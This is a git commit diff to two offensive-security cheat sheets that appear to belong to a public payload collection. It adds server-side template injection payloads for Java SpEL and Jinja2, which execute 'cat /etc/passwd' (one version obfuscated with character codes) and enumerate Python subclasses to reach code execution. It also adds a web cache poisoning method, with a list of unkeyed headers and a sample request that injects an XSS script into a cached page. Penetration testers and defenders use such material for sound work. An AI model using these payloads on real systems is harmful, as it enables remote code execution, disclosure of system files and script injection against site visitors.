Web Cache Deception details from SI9INT's blogpost
parent
8bef006d7f
commit
1a1a48c725
|
@ -46,6 +46,8 @@ ${T(java.lang.System).getenv()}
|
|||
### Java - Retrieve /etc/passwd
|
||||
|
||||
```java
|
||||
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||
|
||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||
```
|
||||
|
||||
|
@ -160,6 +162,8 @@ The above injections have been tested on Flask application.
|
|||
### Jinja2 - Dump all used classes
|
||||
|
||||
```python
|
||||
{{ [].class.base.subclasses() }}
|
||||
{{''.class.mro()[1].subclasses()}}
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
```
|
||||
|
||||
|
@ -223,4 +227,5 @@ $eval('1+1')
|
|||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
||||
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
||||
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
|
@ -1,5 +1,10 @@
|
|||
# Web Cache Deception Attack
|
||||
|
||||
## Tools
|
||||
|
||||
* [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner)
|
||||
> This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
|
||||
|
||||
## Exploit
|
||||
|
||||
1. Browser requests `http://www.example.com/home.php/non-existent.css`.
|
||||
|
@ -16,11 +21,37 @@
|
|||
4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicous.css`
|
||||
5. The content of the cache is displayed
|
||||
|
||||
Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
||||
[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
|
||||
|
||||
Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
||||
## Methodology 2
|
||||
|
||||
1. Find an unkeyed input for a Cache Poisoning
|
||||
```js
|
||||
Values: User-Agent
|
||||
Values: Cookie
|
||||
Header: X-Forwarded-Host
|
||||
Header: X-Host
|
||||
Header: X-Forwarded-Server
|
||||
Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host)
|
||||
Header: X-Original-URL (Symfony)
|
||||
Header: X-Rewrite-URL (Symfony)
|
||||
```
|
||||
2. Cache poisonning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
|
||||
```js
|
||||
GET /test?buster=123 HTTP/1.1
|
||||
Host: target.com
|
||||
X-Forwarded-Host: test"><script>alert(1)</script>
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Cache-Control: public, no-cache
|
||||
[..]
|
||||
<meta property="og:image" content="https://test"><script>alert(1)</script>">
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
|
||||
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
||||
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
||||
* [Web Caching - SI9INT](https://si9int.sh/article/6)
|
Loading…
Reference in New Issue